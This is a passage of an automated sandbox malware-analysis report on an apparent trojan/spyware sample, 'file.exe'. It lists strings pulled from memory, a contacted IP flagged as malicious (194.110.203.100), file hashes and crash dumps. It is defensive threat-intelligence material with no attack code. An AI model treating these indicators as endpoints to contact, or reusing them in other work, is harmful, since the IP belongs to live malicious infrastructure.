                                                                          http://tempuri.org/Entity/Id9ResponseAppLaunch.exe, 00000002.00000002.360684678.000000000768F000.00000004.00000800.00020000.00000000.sdmp, AppLaunch.exe, 00000002.00000002.357962850.00000000073C1000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                          • URL Reputation: safe
                                                                          		unknown
                                                                          https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=AppLaunch.exe, 00000002.00000002.372551259.00000000085B6000.00000004.00000800.00020000.00000000.sdmp, AppLaunch.exe, 00000002.00000002.359831862.00000000075F5000.00000004.00000800.00020000.00000000.sdmp, AppLaunch.exe, 00000002.00000002.360602784.0000000007682000.00000004.00000800.00020000.00000000.sdmp, AppLaunch.exe, 00000002.00000002.358674223.00000000074DD000.00000004.00000800.00020000.00000000.sdmp, AppLaunch.exe, 00000002.00000002.372032571.000000000851B000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                            		high
                                                                            http://tempuri.org/Entity/Id20AppLaunch.exe, 00000002.00000002.357962850.00000000073C1000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                            • URL Reputation: safe
                                                                            		unknown
                                                                            http://tempuri.org/Entity/Id21AppLaunch.exe, 00000002.00000002.357962850.00000000073C1000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                            • URL Reputation: safe
                                                                            		unknown
                                                                            http://tempuri.org/Entity/Id22AppLaunch.exe, 00000002.00000002.358247423.0000000007453000.00000004.00000800.00020000.00000000.sdmp, AppLaunch.exe, 00000002.00000002.357962850.00000000073C1000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                            • URL Reputation: safe
                                                                            		unknown
                                                                            http://docs.oasis-open.org/wss/oasis-wss-kerberos-token-profile-1.1#Kerberosv5APREQSHA1AppLaunch.exe, 00000002.00000002.358247423.0000000007453000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                              		high
                                                                              http://tempuri.org/Entity/Id23AppLaunch.exe, 00000002.00000002.358247423.0000000007453000.00000004.00000800.00020000.00000000.sdmp, AppLaunch.exe, 00000002.00000002.357962850.00000000073C1000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                              • URL Reputation: safe
                                                                              		unknown
                                                                              http://schemas.xmlsoap.org/ws/2004/04/security/trust/CK/PSHA1AppLaunch.exe, 00000002.00000002.358247423.0000000007453000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                		high
                                                                                http://tempuri.org/Entity/Id24AppLaunch.exe, 00000002.00000002.357962850.00000000073C1000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                • URL Reputation: safe
                                                                                		unknown
                                                                                http://schemas.xmlsoap.org/ws/2004/04/security/trust/RSTR/IssueAppLaunch.exe, 00000002.00000002.358247423.0000000007453000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                  		high
                                                                                  http://tempuri.org/Entity/Id24ResponseAppLaunch.exe, 00000002.00000002.357962850.00000000073C1000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                  • URL Reputation: safe
                                                                                  		unknown
                                                                                  http://tempuri.org/Entity/Id1ResponseAppLaunch.exe, 00000002.00000002.358247423.0000000007453000.00000004.00000800.00020000.00000000.sdmp, AppLaunch.exe, 00000002.00000002.357962850.00000000073C1000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                  • URL Reputation: safe
                                                                                  		unknown
                                                                                  https://search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas_sfp&command=AppLaunch.exe, 00000002.00000002.372408978.0000000008599000.00000004.00000800.00020000.00000000.sdmp, AppLaunch.exe, 00000002.00000002.372136186.0000000008538000.00000004.00000800.00020000.00000000.sdmp, AppLaunch.exe, 00000002.00000002.371455315.000000000843C000.00000004.00000800.00020000.00000000.sdmp, AppLaunch.exe, 00000002.00000002.373051767.0000000008690000.00000004.00000800.00020000.00000000.sdmp, AppLaunch.exe, 00000002.00000002.371778582.00000000084BA000.00000004.00000800.00020000.00000000.sdmp, AppLaunch.exe, 00000002.00000002.372805407.000000000862F000.00000004.00000800.00020000.00000000.sdmp, AppLaunch.exe, 00000002.00000002.373188331.00000000086AD000.00000004.00000800.00020000.00000000.sdmp, AppLaunch.exe, 00000002.00000002.371644889.000000000849D000.00000004.00000800.00020000.00000000.sdmp, AppLaunch.exe, 00000002.00000002.371355743.000000000841F000.00000004.00000800.00020000.00000000.sdmp, AppLaunch.exe, 00000002.00000002.372688030.0000000008612000.00000004.00000800.00020000.00000000.sdmp, AppLaunch.exe, 00000002.00000002.359286293.0000000007569000.00000004.00000800.00020000.00000000.sdmp, AppLaunch.exe, 00000002.00000002.372551259.00000000085B6000.00000004.00000800.00020000.00000000.sdmp, AppLaunch.exe, 00000002.00000002.359831862.00000000075F5000.00000004.00000800.00020000.00000000.sdmp, AppLaunch.exe, 00000002.00000002.360602784.0000000007682000.00000004.00000800.00020000.00000000.sdmp, AppLaunch.exe, 00000002.00000002.358674223.00000000074DD000.00000004.00000800.00020000.00000000.sdmp, AppLaunch.exe, 00000002.00000002.372032571.000000000851B000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                    		high
                                                                                    http://schemas.xmlsoap.org/ws/2005/02/rm/AckRequestedAppLaunch.exe, 00000002.00000002.357962850.00000000073C1000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                      		high
                                                                                      http://schemas.xmlsoap.org/ws/2004/10/wsat/ReadOnlyAppLaunch.exe, 00000002.00000002.358247423.0000000007453000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                        		high
                                                                                        http://schemas.xmlsoap.org/ws/2004/10/wsat/ReplayAppLaunch.exe, 00000002.00000002.358247423.0000000007453000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                          		high
                                                                                          http://schemas.xmlsoap.org/ws/2005/02/trust/tlsnegoAppLaunch.exe, 00000002.00000002.358247423.0000000007453000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                            		high
                                                                                            http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-soap-message-security-1.0#Base64BinaryAppLaunch.exe, 00000002.00000002.358247423.0000000007453000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                              		high
                                                                                              http://schemas.xmlsoap.org/ws/2004/10/wsat/Durable2PCAppLaunch.exe, 00000002.00000002.358247423.0000000007453000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                		high
                                                                                                http://schemas.xmlsoap.org/ws/2004/04/security/trust/SymmetricKeyAppLaunch.exe, 00000002.00000002.358247423.0000000007453000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                  		high
                                                                                                  http://schemas.xmlsoap.org/ws/2004/08/addressingAppLaunch.exe, 00000002.00000002.357962850.00000000073C1000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                    		high
                                                                                                    http://schemas.xmlsoap.org/ws/2005/02/trust/RST/IssueAppLaunch.exe, 00000002.00000002.358247423.0000000007453000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                      		high
                                                                                                      http://schemas.xmlsoap.org/ws/2004/10/wsat/CompletionAppLaunch.exe, 00000002.00000002.358247423.0000000007453000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                        		high
                                                                                                        http://schemas.xmlsoap.org/ws/2004/04/trustAppLaunch.exe, 00000002.00000002.358247423.0000000007453000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                          		high
                                                                                                          http://tempuri.org/Entity/Id10AppLaunch.exe, 00000002.00000002.357962850.00000000073C1000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                          • URL Reputation: safe
                                                                                                          		unknown
                                                                                                          http://tempuri.org/Entity/Id11AppLaunch.exe, 00000002.00000002.357962850.00000000073C1000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                          • URL Reputation: safe
                                                                                                          		unknown
                                                                                                          http://tempuri.org/Entity/Id12AppLaunch.exe, 00000002.00000002.357962850.00000000073C1000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                          • URL Reputation: safe
                                                                                                          • URL Reputation: safe
                                                                                                          		unknown
                                                                                                          http://tempuri.org/Entity/Id16ResponseAppLaunch.exe, 00000002.00000002.360684678.000000000768F000.00000004.00000800.00020000.00000000.sdmp, AppLaunch.exe, 00000002.00000002.357962850.00000000073C1000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                          • URL Reputation: safe
                                                                                                          • URL Reputation: safe
                                                                                                          		unknown
                                                                                                          http://schemas.xmlsoap.org/ws/2004/10/wscoor/CreateCoordinationContextResponseAppLaunch.exe, 00000002.00000002.358247423.0000000007453000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                            		high
                                                                                                            http://schemas.xmlsoap.org/ws/2005/02/trust/RST/SCT/CancelAppLaunch.exe, 00000002.00000002.358247423.0000000007453000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                              		high
                                                                                                              http://tempuri.org/Entity/Id13AppLaunch.exe, 00000002.00000002.357962850.00000000073C1000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                              • URL Reputation: safe
                                                                                                              • URL Reputation: safe
                                                                                                              		unknown
                                                                                                              http://tempuri.org/Entity/Id14AppLaunch.exe, 00000002.00000002.357962850.00000000073C1000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                              • URL Reputation: safe
                                                                                                              		unknown
                                                                                                              http://tempuri.org/Entity/Id15AppLaunch.exe, 00000002.00000002.357962850.00000000073C1000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                              • URL Reputation: safe
                                                                                                              		unknown
                                                                                                              http://tempuri.org/Entity/Id16AppLaunch.exe, 00000002.00000002.357962850.00000000073C1000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                              • URL Reputation: safe
                                                                                                              		unknown
                                                                                                              http://schemas.xmlsoap.org/ws/2005/02/trust/NonceAppLaunch.exe, 00000002.00000002.358247423.0000000007453000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                		high
                                                                                                                http://tempuri.org/Entity/Id17AppLaunch.exe, 00000002.00000002.357962850.00000000073C1000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                • URL Reputation: safe
                                                                                                                		unknown
                                                                                                                http://tempuri.org/Entity/Id18AppLaunch.exe, 00000002.00000002.357962850.00000000073C1000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                • URL Reputation: safe
                                                                                                                		unknown
                                                                                                                http://tempuri.org/Entity/Id5ResponseAppLaunch.exe, 00000002.00000002.357962850.00000000073C1000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                • URL Reputation: safe
                                                                                                                		unknown
                                                                                                                http://tempuri.org/Entity/Id19AppLaunch.exe, 00000002.00000002.357962850.00000000073C1000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                • URL Reputation: safe
                                                                                                                		unknown
                                                                                                                http://schemas.xmlsoap.org/ws/2005/05/identity/claims/dnsAppLaunch.exe, 00000002.00000002.357962850.00000000073C1000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                  		high
                                                                                                                  http://tempuri.org/Entity/Id10ResponseAppLaunch.exe, 00000002.00000002.360684678.000000000768F000.00000004.00000800.00020000.00000000.sdmp, AppLaunch.exe, 00000002.00000002.357962850.00000000073C1000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                  • URL Reputation: safe
                                                                                                                  		unknown
                                                                                                                  http://schemas.xmlsoap.org/ws/2005/02/trust/RenewAppLaunch.exe, 00000002.00000002.358247423.0000000007453000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                    		high
                                                                                                                    http://tempuri.org/Entity/Id8ResponseAppLaunch.exe, 00000002.00000002.358247423.0000000007453000.00000004.00000800.00020000.00000000.sdmp, AppLaunch.exe, 00000002.00000002.357962850.00000000073C1000.00000004.00000800.00020000.00000000.sdmp, AppLaunch.exe, 00000002.00000002.363059245.0000000007752000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                    • URL Reputation: safe
                                                                                                                    		unknown
                                                                                                                    http://schemas.xmlsoap.org/ws/2004/04/trust/PublicKeyAppLaunch.exe, 00000002.00000002.358247423.0000000007453000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                      		high
                                                                                                                      http://docs.oasis-open.org/wss/oasis-wss-saml-token-profile-1.1#SAMLV2.0AppLaunch.exe, 00000002.00000002.358247423.0000000007453000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                        		high
                                                                                                                        http://docs.oasis-open.org/wss/oasis-wss-saml-token-profile-1.0#SAMLAssertionIDAppLaunch.exe, 00000002.00000002.358247423.0000000007453000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                          		high
                                                                                                                          http://schemas.xmlsoap.org/ws/2004/04/security/trust/RST/SCTAppLaunch.exe, 00000002.00000002.358247423.0000000007453000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                            		high
                                                                                                                            http://schemas.xmlsoap.org/ws/2006/02/addressingidentityAppLaunch.exe, 00000002.00000002.358247423.0000000007453000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                              		high
                                                                                                                              http://schemas.xmlsoap.org/soap/envelope/AppLaunch.exe, 00000002.00000002.357962850.00000000073C1000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                		high
                                                                                                                                https://search.yahoo.com?fr=crmas_sfpfAppLaunch.exe, 00000002.00000002.372408978.0000000008599000.00000004.00000800.00020000.00000000.sdmp, AppLaunch.exe, 00000002.00000002.372136186.0000000008538000.00000004.00000800.00020000.00000000.sdmp, AppLaunch.exe, 00000002.00000002.371455315.000000000843C000.00000004.00000800.00020000.00000000.sdmp, AppLaunch.exe, 00000002.00000002.373051767.0000000008690000.00000004.00000800.00020000.00000000.sdmp, AppLaunch.exe, 00000002.00000002.371778582.00000000084BA000.00000004.00000800.00020000.00000000.sdmp, AppLaunch.exe, 00000002.00000002.372805407.000000000862F000.00000004.00000800.00020000.00000000.sdmp, AppLaunch.exe, 00000002.00000002.373188331.00000000086AD000.00000004.00000800.00020000.00000000.sdmp, AppLaunch.exe, 00000002.00000002.371644889.000000000849D000.00000004.00000800.00020000.00000000.sdmp, AppLaunch.exe, 00000002.00000002.371355743.000000000841F000.00000004.00000800.00020000.00000000.sdmp, AppLaunch.exe, 00000002.00000002.372688030.0000000008612000.00000004.00000800.00020000.00000000.sdmp, AppLaunch.exe, 00000002.00000002.359286293.0000000007569000.00000004.00000800.00020000.00000000.sdmp, AppLaunch.exe, 00000002.00000002.372551259.00000000085B6000.00000004.00000800.00020000.00000000.sdmp, AppLaunch.exe, 00000002.00000002.359831862.00000000075F5000.00000004.00000800.00020000.00000000.sdmp, AppLaunch.exe, 00000002.00000002.360602784.0000000007682000.00000004.00000800.00020000.00000000.sdmp, AppLaunch.exe, 00000002.00000002.358674223.00000000074DD000.00000004.00000800.00020000.00000000.sdmp, AppLaunch.exe, 00000002.00000002.372032571.000000000851B000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                  		high
                                                                                                                                  http://schemas.xmlsoap.org/ws/2005/02/trust/PublicKeyAppLaunch.exe, 00000002.00000002.358247423.0000000007453000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                    		high
                                                                                                                                    http://docs.oasis-open.org/wss/oasis-wss-soap-message-security-1.1#EncryptedKeySHA1AppLaunch.exe, 00000002.00000002.358247423.0000000007453000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                      		high
                                                                                                                                      http://schemas.xmlsoap.org/ws/2005/02/trustAppLaunch.exe, 00000002.00000002.358247423.0000000007453000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                        		high
                                                                                                                                        http://schemas.xmlsoap.org/ws/2004/10/wsat/RollbackAppLaunch.exe, 00000002.00000002.358247423.0000000007453000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                          		high
                                                                                                                                          http://tempuri.org/Entity/Id23ResponseAppLaunch.exe, 00000002.00000002.363059245.0000000007752000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                          • URL Reputation: safe
                                                                                                                                          		unknown
                                                                                                                                          http://schemas.xmlsoap.org/ws/2004/04/security/trust/RSTR/SCTAppLaunch.exe, 00000002.00000002.358247423.0000000007453000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                            		high
                                                                                                                                            http://schemas.xmlsoap.org/ws/2004/06/addressingexAppLaunch.exe, 00000002.00000002.358247423.0000000007453000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                              		high
                                                                                                                                              http://schemas.xmlsoap.org/ws/2004/10/wscoorAppLaunch.exe, 00000002.00000002.358247423.0000000007453000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                		high
                                                                                                                                                http://schemas.xmlsoap.org/ws/2004/04/security/trust/NonceAppLaunch.exe, 00000002.00000002.358247423.0000000007453000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                  		high
                                                                                                                                                  http://schemas.xmlsoap.org/ws/2005/02/rm/CreateSequenceResponseAppLaunch.exe, 00000002.00000002.357962850.00000000073C1000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                    		high

                                                                                                                                                    World Map of Contacted IPs

                                                                                                                                                    • No. of IPs < 25%
                                                                                                                                                    • 25% < No. of IPs < 50%
                                                                                                                                                    • 50% < No. of IPs < 75%
                                                                                                                                                    • 75% < No. of IPs

                                                                                                                                                    Public IPs

                                                                                                                                                    IPDomainCountryFlagASNASN NameMalicious
                                                                                                                                                    194.110.203.100
                                                                                                                                                    		unknownUnited Kingdom
                                                                                                                                                    		42693KMBBANK-ASRUtrue

                                                                                                                                                    General Information

                                                                                                                                                    Joe Sandbox Version:36.0.0 Rainbow Opal
                                                                                                                                                    Analysis ID:740246
                                                                                                                                                    Start date and time:2022-11-07 20:01:20 +01:00
                                                                                                                                                    Joe Sandbox Product:CloudBasic
                                                                                                                                                    Overall analysis duration:0h 8m 24s
                                                                                                                                                    Hypervisor based Inspection enabled:false
                                                                                                                                                    Report type:full
                                                                                                                                                    Sample file name:file.exe
                                                                                                                                                    Cookbook file name:default.jbs
                                                                                                                                                    Analysis system description:Windows 10 64 bit v1803 with Office Professional Plus 2016, Chrome 104, IE 11, Adobe Reader DC 19, Java 8 Update 211
                                                                                                                                                    Number of analysed new started processes analysed:15
                                                                                                                                                    Number of new started drivers analysed:0
                                                                                                                                                    Number of existing processes analysed:0
                                                                                                                                                    Number of existing drivers analysed:0
                                                                                                                                                    Number of injected processes analysed:0
                                                                                                                                                    Technologies:
                                                                                                                                                    • HCA enabled
                                                                                                                                                    • EGA enabled
                                                                                                                                                    • HDC enabled
                                                                                                                                                    • AMSI enabled
                                                                                                                                                    Analysis Mode:default
                                                                                                                                                    Analysis stop reason:Timeout
                                                                                                                                                    Detection:MAL
                                                                                                                                                    Classification:mal100.troj.spyw.evad.winEXE@8/6@0/1
                                                                                                                                                    EGA Information:
                                                                                                                                                    • Successful, ratio: 50%
                                                                                                                                                    HDC Information:
                                                                                                                                                    • Successful, ratio: 97.3% (good quality ratio 90.8%)
                                                                                                                                                    • Quality average: 78.1%
                                                                                                                                                    • Quality standard deviation: 29.1%
                                                                                                                                                    HCA Information:
                                                                                                                                                    • Successful, ratio: 100%
                                                                                                                                                    • Number of executed functions: 102
                                                                                                                                                    • Number of non-executed functions: 70
                                                                                                                                                    Cookbook Comments:
                                                                                                                                                    • Found application associated with file extension: .exe

                                                                                                                                                    Warnings

                                                                                                                                                    • Exclude process from analysis (whitelisted): MpCmdRun.exe, WerFault.exe, SgrmBroker.exe, conhost.exe, svchost.exe
                                                                                                                                                    • Excluded IPs from analysis (whitelisted): 20.42.65.92
                                                                                                                                                    • Excluded domains from analysis (whitelisted): client.wns.windows.com, fs.microsoft.com, onedsblobprdeus17.eastus.cloudapp.azure.com, login.live.com, blobcollector.events.data.trafficmanager.net, watson.telemetry.microsoft.com
                                                                                                                                                    • Execution Graph export aborted for target AppLaunch.exe, PID 100032 because it is empty
                                                                                                                                                    • Not all processes where analyzed, report is missing behavior information
                                                                                                                                                    • Report creation exceeded maximum time and may have missing disassembly code information.
                                                                                                                                                    • Report size exceeded maximum capacity and may have missing behavior information.
                                                                                                                                                    • Report size getting too big, too many NtAllocateVirtualMemory calls found.
                                                                                                                                                    • Report size getting too big, too many NtProtectVirtualMemory calls found.
                                                                                                                                                    • Report size getting too big, too many NtQueryValueKey calls found.

                                                                                                                                                    Simulations

                                                                                                                                                    Behavior and APIs

                                                                                                                                                    TimeTypeDescription
                                                                                                                                                    20:02:46API Interceptor1x Sleep call for process: WerFault.exe modified
                                                                                                                                                    20:03:04API Interceptor26x Sleep call for process: AppLaunch.exe modified

                                                                                                                                                    Joe Sandbox View / Context

                                                                                                                                                    IPs

                                                                                                                                                    MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
                                                                                                                                                    194.110.203.100file.exeGet hashmaliciousBrowse
                                                                                                                                                      file.exeGet hashmaliciousBrowse
                                                                                                                                                        file.exeGet hashmaliciousBrowse
                                                                                                                                                          file.exeGet hashmaliciousBrowse
                                                                                                                                                            file.exeGet hashmaliciousBrowse
                                                                                                                                                              file.exeGet hashmaliciousBrowse
                                                                                                                                                                file.exeGet hashmaliciousBrowse
                                                                                                                                                                  file.exeGet hashmaliciousBrowse
                                                                                                                                                                    file.exeGet hashmaliciousBrowse
                                                                                                                                                                      file.exeGet hashmaliciousBrowse

                                                                                                                                                                        Domains

                                                                                                                                                                        No context

                                                                                                                                                                        ASNs

                                                                                                                                                                        MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
                                                                                                                                                                        KMBBANK-ASRUfile.exeGet hashmaliciousBrowse
                                                                                                                                                                        • 194.110.203.100
                                                                                                                                                                        file.exeGet hashmaliciousBrowse
                                                                                                                                                                        • 194.110.203.100
                                                                                                                                                                        file.exeGet hashmaliciousBrowse
                                                                                                                                                                        • 194.110.203.100
                                                                                                                                                                        file.exeGet hashmaliciousBrowse
                                                                                                                                                                        • 194.110.203.100
                                                                                                                                                                        file.exeGet hashmaliciousBrowse
                                                                                                                                                                        • 194.110.203.100
                                                                                                                                                                        file.exeGet hashmaliciousBrowse
                                                                                                                                                                        • 194.110.203.100
                                                                                                                                                                        file.exeGet hashmaliciousBrowse
                                                                                                                                                                        • 194.110.203.100
                                                                                                                                                                        file.exeGet hashmaliciousBrowse
                                                                                                                                                                        • 194.110.203.100
                                                                                                                                                                        file.exeGet hashmaliciousBrowse
                                                                                                                                                                        • 194.110.203.100
                                                                                                                                                                        file.exeGet hashmaliciousBrowse
                                                                                                                                                                        • 194.110.203.100

                                                                                                                                                                        JA3 Fingerprints

                                                                                                                                                                        No context

                                                                                                                                                                        Dropped Files

                                                                                                                                                                        No context

                                                                                                                                                                        Created / dropped Files

                                                                                                                                                                        C:\ProgramData\Microsoft\Windows\WER\ReportQueue\AppCrash_file.exe_2badc22553de5577b078ab10208ce43d7e4f5c0_ae08e2d3_8757f04c\Report.wer

                                                                                                                                                                        Download File
                                                                                                                                                                        Process:C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                                        File Type:Unicode text, UTF-16, little-endian text, with CRLF line terminators
                                                                                                                                                                        Category:dropped
                                                                                                                                                                        Size (bytes):65536
                                                                                                                                                                        Entropy (8bit):0.6146576752327751
                                                                                                                                                                        Encrypted:false
                                                                                                                                                                        SSDEEP:192:8x8bPvcWkHBUZMXz03jE/u7sLS274ItmhB:NCBUZMXYjE/u7sLX4ItA
                                                                                                                                                                        MD5:87FC08DFB1CDBBEECED61F71782858B6
                                                                                                                                                                        SHA1:D8DE7FFC4D42D45D576DF967B761A3E9C612A0C8
                                                                                                                                                                        SHA-256:36E068F5844B4955F152E6259DF99FABE9F93FC9B750B5715F306B7776E358B2
                                                                                                                                                                        SHA-512:28528648875BBCF03372726817FF71836E63C641B0C2AE6FC6A56B9D1C2C83C941CC0FF158083DFECE0AB22F4917CA76D3A1206E93F770CE8BFA85B1CF3AB105
                                                                                                                                                                        Malicious:true
                                                                                                                                                                        Reputation:low
                                                                                                                                                                        Preview:..V.e.r.s.i.o.n.=.1.....E.v.e.n.t.T.y.p.e.=.A.P.P.C.R.A.S.H.....E.v.e.n.t.T.i.m.e.=.1.3.3.1.2.3.5.3.7.6.2.6.2.1.5.1.9.8.....R.e.p.o.r.t.T.y.p.e.=.2.....C.o.n.s.e.n.t.=.1.....U.p.l.o.a.d.T.i.m.e.=.1.3.3.1.2.3.5.3.7.6.4.8.2.4.6.3.8.5.....R.e.p.o.r.t.S.t.a.t.u.s.=.5.2.4.3.8.4.....R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.d.5.e.5.5.b.a.3.-.f.4.5.b.-.4.4.9.a.-.9.b.7.7.-.f.7.3.c.e.3.0.b.8.7.a.7.....I.n.t.e.g.r.a.t.o.r.R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.d.4.0.f.e.9.2.b.-.9.f.1.8.-.4.4.b.5.-.b.9.a.8.-.5.1.2.d.8.8.3.0.1.e.1.4.....W.o.w.6.4.H.o.s.t.=.3.4.4.0.4.....W.o.w.6.4.G.u.e.s.t.=.3.3.2.....N.s.A.p.p.N.a.m.e.=.f.i.l.e...e.x.e.....A.p.p.S.e.s.s.i.o.n.G.u.i.d.=.0.0.0.0.1.6.d.0.-.0.0.0.1.-.0.0.1.a.-.4.3.0.f.-.0.c.e.4.2.6.f.3.d.8.0.1.....T.a.r.g.e.t.A.p.p.I.d.=.W.:.0.0.0.6.7.e.4.9.2.d.7.6.8.e.7.9.7.3.1.6.2.4.b.c.d.f.2.e.7.6.1.5.f.9.1.8.0.0.0.0.f.f.f.f.!.0.0.0.0.3.f.1.d.e.c.6.1.6.7.f.3.e.5.2.c.4.a.7.2.3.0.9.5.b.f.f.9.9.9.a.e.d.3.1.c.7.1.c.3.!.f.i.l.e...e.x.e.....T.a.r.g.e.t.A.p.p.V.e.r.=.2.0.2.2././.1.1.

                                                                                                                                                                        C:\ProgramData\Microsoft\Windows\WER\Temp\WERE0DB.tmp.dmp

                                                                                                                                                                        Download File
                                                                                                                                                                        Process:C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                                        File Type:Mini DuMP crash report, 14 streams, Tue Nov 8 04:02:43 2022, 0x1205a4 type
                                                                                                                                                                        Category:dropped
                                                                                                                                                                        Size (bytes):2326066
                                                                                                                                                                        Entropy (8bit):2.72014094231897
                                                                                                                                                                        Encrypted:false
                                                                                                                                                                        SSDEEP:6144:XOBvoBDGxNDw128unr2TkWcgviLt5OTl4MRkifkOJn19DoEWp5:XCopEl5aVccHlvt19DoEWf
                                                                                                                                                                        MD5:C6E94E8DC885B44B7491FB58D0DDC0A8
                                                                                                                                                                        SHA1:7A723B25DB742C0F6D819498D1E46826E5D4BFC4
                                                                                                                                                                        SHA-256:1B04E24A87AC1013804FC3C020491B7A5B3AF44126264646468FF327DABD4364
                                                                                                                                                                        SHA-512:9776267A59359E97EFFB32D98F4290B961CAAF2C2F50AAA35DC7F4D08928AAFEC94297C932AC4DF96AAF0C5FBF4E7C1C55F08D0F4C75B83B8E241CF64E53B937
                                                                                                                                                                        Malicious:false
                                                                                                                                                                        Reputation:low
                                                                                                                                                                        Preview:MDMP....... .........ic............4........... ...<.......T...............T.......8...........T............g..z...........\...........H....................................................................U...........B..............GenuineIntelW...........T.............ic.............................0..................P.a.c.i.f.i.c. .S.t.a.n.d.a.r.d. .T.i.m.e...........................................P.a.c.i.f.i.c. .D.a.y.l.i.g.h.t. .T.i.m.e...........................................1.7.1.3.4...1...x.8.6.f.r.e...r.s.4._.r.e.l.e.a.s.e...1.8.0.4.1.0.-.1.8.0.4.....................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                        C:\ProgramData\Microsoft\Windows\WER\Temp\WERE7E1.tmp.WERInternalMetadata.xml

                                                                                                                                                                        Download File
                                                                                                                                                                        Process:C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                                        File Type:XML 1.0 document, Unicode text, UTF-16, little-endian text, with CRLF line terminators
                                                                                                                                                                        Category:dropped
                                                                                                                                                                        Size (bytes):8268
                                                                                                                                                                        Entropy (8bit):3.693331909547304
                                                                                                                                                                        Encrypted:false
                                                                                                                                                                        SSDEEP:192:Rrl7r3GLNiLCE6Dh6YqbSUVZ0igmfBSVS/OCprV89bWbsfNym:RrlsNit6F6YGSUjJgmfOScWgfp
                                                                                                                                                                        MD5:9A2D91907082D657F924A56CD80E3F64
                                                                                                                                                                        SHA1:31DA20E5E800B1EA2C3A4803E3CB2DCFEFE9AEEC
                                                                                                                                                                        SHA-256:CD54AEB84D9F2D772C98904CE0F24F0387EE722D9548D45B08A75C2831C591F4
                                                                                                                                                                        SHA-512:245BEDDB7C37623166424A1EA5D5DF20F55AF927C9251C6473BBA8528F0090512680DDCE1876C284EEBD2DD01A6DD6440481BE6473793E3BA75F5F3B9075BBFA
                                                                                                                                                                        Malicious:false
                                                                                                                                                                        Reputation:low
